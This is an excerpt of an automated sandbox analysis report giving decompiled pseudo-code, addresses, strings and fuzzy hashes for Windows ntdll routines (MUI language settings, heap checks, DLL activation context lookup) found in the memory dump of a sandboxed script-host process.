					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E05951B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E05951B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E05951B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E05951B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E05951B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L05964620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0598F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E05991370(_t276, 0x5924e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0598BB40(0,  &_v68, _t170);
									if(L059543C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0598BB40(_t257,  &_v68, _t243);
								if(L059543C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E05991370(_t278, 0x5924e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L05964620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0598F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E05991370(_v16, 0x5924e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0598BB40(_t262,  &_v68, _t244);
								if(L059543C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E05991370(_t282, 0x5924e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0598BB40(_t262,  &_v68, _t201);
							if(L059543C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L05964620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0598F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E05991370(_t280, 0x5924e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0598BB40(_t267,  &_v68, _t245);
							if(L059543C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E05991370(_t284, 0x5924e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0598BB40(_t267,  &_v68, _t224);
						if(L059543C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x05953d3c
0x05953d42
0x05953d44
0x05953d46
0x05953d49
0x05953d4c
0x05953d4f
0x05953d52
0x05953d55
0x05953d58
0x05953d5b
0x05953d5f
0x05953d61
0x05953d66
0x059a8213
0x059a8218
0x05954085
0x05954088
0x0595408e
0x05954094
0x0595409a
0x059540a0
0x059540a6
0x059540a9
0x059540af
0x059540b6
0x059540bd
0x059540bd
0x05953d83
0x059a821f
0x059a8229
0x059a8238
0x059a8238
0x059a823d
0x059a823d
0x05953da0
0x05953daf
0x05953db5
0x05953dba
0x05953dba
0x05953dd4
0x05953e94
0x05953eab
0x05953f6d
0x05953f84
0x0595406b
0x0595406b
0x0595406e
0x0595406e
0x05954070
0x05954074
0x059a8351
0x059a8351
0x0595407a
0x0595407f
0x059a835d
0x059a8370
0x059a8377
0x059a8379
0x059a837c
0x059a837c
0x059a835d
0x00000000
0x0595407f
0x05953f8a
0x05953f8d
0x05953f90
0x05953f95
0x059a830d
0x059a830f
0x05953f9b
0x05953fac
0x05953fae
0x05953fb1
0x05953fb1
0x05953fb6
0x059a8317
0x059a831a
0x00000000
0x05953fbc
0x05953fc1
0x05953fc9
0x05953fd7
0x05953fda
0x05953fdd
0x05954021
0x05954021
0x05954029
0x05954030
0x05954044
0x05954046
0x05954046
0x05954044
0x05954049
0x059a8327
0x059a8334
0x059a8339
0x059a833c
0x0595404f
0x0595404f
0x0595404f
0x05954051
0x05954056
0x05954063
0x05954063
0x05954068
0x00000000
0x05954068
0x05953fdf
0x05953fe2
0x05953fe4
0x05953fe7
0x05953fef
0x05954003
0x05954005
0x05954005
0x0595400c
0x05954013
0x05954016
0x05954017
0x0595401b
0x0595401e
0x00000000
0x0595401e
0x05953fb6
0x05953eb1
0x05953eb4
0x05953eb7
0x05953ebc
0x059a82a9
0x059a82ab
0x05953ec2
0x05953ed3
0x05953ed5
0x05953ed8
0x05953ed8
0x05953edd
0x059a82b3
0x059a82b6
0x00000000
0x05953ee3
0x05953ee8
0x05953eed
0x05953ef0
0x05953ef3
0x05953f02
0x05953f05
0x05953f08
0x059a82c0
0x059a82c3
0x059a82c5
0x059a82c8
0x059a82d0
0x059a82e4
0x059a82e6
0x059a82e6
0x059a82ed
0x059a82f4
0x059a82f7
0x059a82f8
0x059a82fc
0x059a82ff
0x059a82ff
0x05953f0e
0x05953f11
0x05953f16
0x05953f1d
0x05953f31
0x059a8307
0x059a8307
0x05953f31
0x05953f39
0x05953f48
0x05953f4d
0x05953f50
0x05953f50
0x05953f53
0x05953f58
0x05953f65
0x05953f65
0x05953f6a
0x00000000
0x05953f6a
0x05953edd
0x05953dda
0x05953ddd
0x05953de0
0x05953de5
0x059a8245
0x05953deb
0x05953df7
0x05953dfc
0x05953dfe
0x05953e01
0x05953e01
0x05953e06
0x059a824d
0x059a824f
0x059a8254
0x00000000
0x05953e0c
0x05953e11
0x05953e16
0x05953e19
0x05953e29
0x05953e2c
0x05953e2f
0x059a825c
0x059a825f
0x059a8261
0x059a8264
0x059a826c
0x059a8280
0x059a8282
0x059a8282
0x059a8289
0x059a8290
0x059a8293
0x059a8294
0x059a8298
0x059a829b
0x059a829b
0x05953e35
0x05953e38
0x05953e3d
0x05953e44
0x05953e58
0x059a82a3
0x059a82a3
0x05953e58
0x05953e60
0x05953e6f
0x05953e74
0x05953e77
0x05953e77
0x05953e7a
0x05953e7f
0x05953e8c
0x05953e8c
0x05953e91
0x00000000
0x05953e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 05953DC0
WindowsExcludedProcs, xrefs: 05953D6F
Kernel-MUI-Number-Allowed, xrefs: 05953D8C
Kernel-MUI-Language-SKU, xrefs: 05953F70
Kernel-MUI-Language-Disallowed, xrefs: 05953E97

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 14e6d89bbe10f6dc76f28cdbec71c8301e4bd05927682c2a17425a8e4fff57e2
Instruction ID: 1bd52be603b7a5506b8346e67aa5270b0fc8e91fa76b79da1f9905c32163357a
Opcode Fuzzy Hash: 14e6d89bbe10f6dc76f28cdbec71c8301e4bd05927682c2a17425a8e4fff57e2
Instruction Fuzzy Hash: 80F12E72E10619EBCF11DF98C984EEEB7BDFF48650F14446AE905A7210E734AE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 059440E1 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E059440E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0594B150();
					} else {
						E0594B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0594B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0594B150(", passed to %s", _t29);
					}
					_push("\n");
					E0594B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x5a36378 = 1;
						asm("int3");
						 *0x5a36378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x059440e6
0x059440e8
0x059440f1
0x059a042d
0x059a044c
0x059a0451
0x059a042f
0x059a0444
0x059a0449
0x059a045d
0x059a0466
0x059a046e
0x059a0474
0x059a0475
0x059a047a
0x059a048a
0x059a048c
0x059a0493
0x059a0494
0x059a0494
0x00000000
0x059a049b
0x00000000

Strings

RtlAllocateHeap, xrefs: 059A0468
HEAP: , xrefs: 059A044C
HEAP[%wZ]: , xrefs: 059A043F
Invalid heap signature for heap at %p, xrefs: 059A0458
, passed to %s, xrefs: 059A0469

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: ed98f8ec88166f2a04a173e30709fd326dd674d64014103c43200f7855289478
Instruction ID: c2ee18851dd37d7d4c3c231677c46a3d05eb9b6972dcbaea8d7dc34292d53def
Opcode Fuzzy Hash: ed98f8ec88166f2a04a173e30709fd326dd674d64014103c43200f7855289478
Instruction Fuzzy Hash: 50014C33218250AED3199F78E50EFA677E9FB85B30F284029F00947A40DFB4EC40D960

Uniqueness

Uniqueness Score: -1.00%

Function 05978E00 Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E05978E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x5a3d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x5a38464; // 0x74cc0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x5a35780 & 0x00000003) != 0) {
							E059C5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x5a35780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0598B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x5a37984; // 0x2a72c78
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x5a38464; // 0x74cc0110
					 *0x5a3b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E05979B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x5a35780 & 0x00000005) != 0) {
						_push(_t49);
						E059C5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x05978e0f
0x05978e16
0x05978e19
0x05978e1b
0x05978e21
0x05978e7f
0x05978e85
0x059b9354
0x059b936c
0x059b9371
0x059b937b
0x059b9381
0x059b9381
0x059b937b
0x05978e9d
0x05978e9d
0x05978e29
0x05978e2c
0x05978e38
0x05978e3e
0x05978e43
0x05978eb5
0x05978eb9
0x059b92aa
0x059b92af
0x059b92e8
0x059b92e8
0x059b92af
0x05978eb9
0x05978e45
0x05978e53
0x05978e5b
0x05978e5f
0x05978e78
0x05978e78
0x05978e7d
0x05978ec3
0x05978ecd
0x05978ed2
0x05978ed2
0x05978ec5
0x05978ec5
0x00000000
0x05978e7d
0x05978e67
0x05978ea4
0x059b931a
0x00000000
0x00000000
0x059b9320
0x05978ea4
0x05978e70
0x059b9325
0x059b9340
0x059b9345
0x059b9345
0x05978e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 059B932A
Querying the active activation context failed with status 0x%08lx, xrefs: 059B9357
LdrpFindDllActivationContext, xrefs: 059B9331, 059B935D
minkernel\ntdll\ldrsnap.c, xrefs: 059B933B, 059B9367

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 4558b97af7b2c4acd20cb8512e2957af10a3b472cf767b2f3a2663a541d9e4ee
Instruction ID: fe5ce5941c0bf73a02780a490ba742b1dc82660e1b28793605016b33dad8cdd5
Opcode Fuzzy Hash: 4558b97af7b2c4acd20cb8512e2957af10a3b472cf767b2f3a2663a541d9e4ee
Instruction Fuzzy Hash: 29412732A0431DDEDF35BA18C88DE7AB7AEBF44648F05456BF90997550EB706D808281

Uniqueness

Uniqueness Score: -1.00%

Function 05A049A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 05A04AD6
HEAP[%wZ]: , xrefs: 05A04A3D, 05A04AB7
HEAP: , xrefs: 05A04A4A, 05A04A5D, 05A04A5F, 05A04AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 05A04A61

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: d4cdc2aa11d5981f5c3a6dd124c3da64f87146c21736639080473574ec095180
Instruction ID: 88bd62cfe708a0ec5d83290cbd24a81b91532a11b293dc26ed2611388302b9b5
Opcode Fuzzy Hash: d4cdc2aa11d5981f5c3a6dd124c3da64f87146c21736639080473574ec095180
Instruction Fuzzy Hash: 13310435225220EFCB20DFA9E889F6B73A9FF48760F145055F6168B690DB71E840DA68

Uniqueness

Uniqueness Score: -1.00%

Function 05958794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E05958794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0595934A() != 0) {
								_t159 = E059CA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x5a35780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E059C5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x5a35780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0595849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E05958999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E05958999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x5a35c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x5a35c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E05962280(_t92, 0x5a386cc);
															_t94 = E05A19DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E059761A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x5a35c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E05958A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x5a35c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x5a35c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0598F380(_t136, 0x5921184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E05962280(_t108, 0x5a386cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E059761A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E05A19D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0595FFB0(_t118, _t156, 0x5a386cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E05989A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x05958799
0x0595879d
0x059587a1
0x059587a3
0x059587a8
0x059587c3
0x059587c3
0x059587c8
0x059587d1
0x059587d4
0x059587d8
0x059587e5
0x059587ec
0x059a9bfe
0x059a9c00
0x059a9c02
0x059a9c08
0x059a9c0d
0x059a9c0f
0x059a9c14
0x059a9c2d
0x059a9c32
0x059a9c37
0x059a9c3a
0x059a9c3c
0x059a9c42
0x059a9c42
0x059a9c3c
0x059a9c02
0x059587da
0x059587df
0x059587e3
0x00000000
0x00000000
0x059587e3
0x059587f2
0x00000000
0x059587fb
0x059587fd
0x059587fe
0x0595880e
0x0595880f
0x05958810
0x05958814
0x0595881a
0x0595881c
0x0595881f
0x05958821
0x05958822
0x05958824
0x05958826
0x0595882c
0x0595882e
0x059a9c48
0x059a9c48
0x05958834
0x05958834
0x05958837
0x00000000
0x00000000
0x05958837
0x0595882e
0x0595883d
0x05958840
0x05958843
0x05958846
0x05958849
0x0595884c
0x0595884e
0x05958850
0x05958852
0x05958854
0x05958857
0x059588b4
0x059588b6
0x059588b6
0x05958859
0x05958859
0x05958859
0x05958861
0x05958866
0x0595886a
0x0595893d
0x05958941
0x00000000
0x05958947
0x05958947
0x0595894a
0x0595894c
0x00000000
0x05958952
0x05958955
0x0595895a
0x0595895d
0x0595895d
0x0595895f
0x05958961
0x05958961
0x05958968
0x00000000
0x00000000
0x0595896a
0x0595896b
0x0595896e
0x00000000
0x05958970
0x05958970
0x05958970
0x05958970
0x05958972
0x05958972
0x05958974
0x00000000
0x0595897a
0x0595897a
0x0595897d
0x00000000
0x05958983
0x059a9c65
0x059a9c6d
0x059a9c72
0x059a9c75
0x059a9c75
0x059a9c82
0x059a9c86
0x059a9c87
0x059a9c88
0x059a9c89
0x059a9c8c
0x059a9c90
0x059a9c95
0x059a9c97
0x059a9ca0
0x059a9ca3
0x059a9ca9
0x059a9ca9
0x00000000
0x059a9ca9
0x059a9ca3
